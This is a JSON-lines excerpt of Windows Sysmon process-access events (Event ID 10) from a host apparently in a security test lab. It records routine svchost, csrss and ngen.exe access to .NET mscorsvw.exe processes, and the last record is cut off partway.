{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001056C40D00}\r\nTargetProcessId: 2936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001056C40D00}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001064C80D00}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001064C80D00}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001064C80D00}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001064C80D00}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001064C80D00}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001064C80D00}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.761\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010E8670D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.761","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010E8670D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.761\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010E8670D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.761","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010E8670D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010DCCC0D00}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010DCCC0D00}","TargetProcessId":"3088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.824\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001001D10D00}\r\nTargetProcessId: 2944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 